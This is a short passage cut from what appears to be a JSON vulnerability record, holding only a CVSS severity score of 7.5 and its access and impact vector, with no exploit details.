"cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
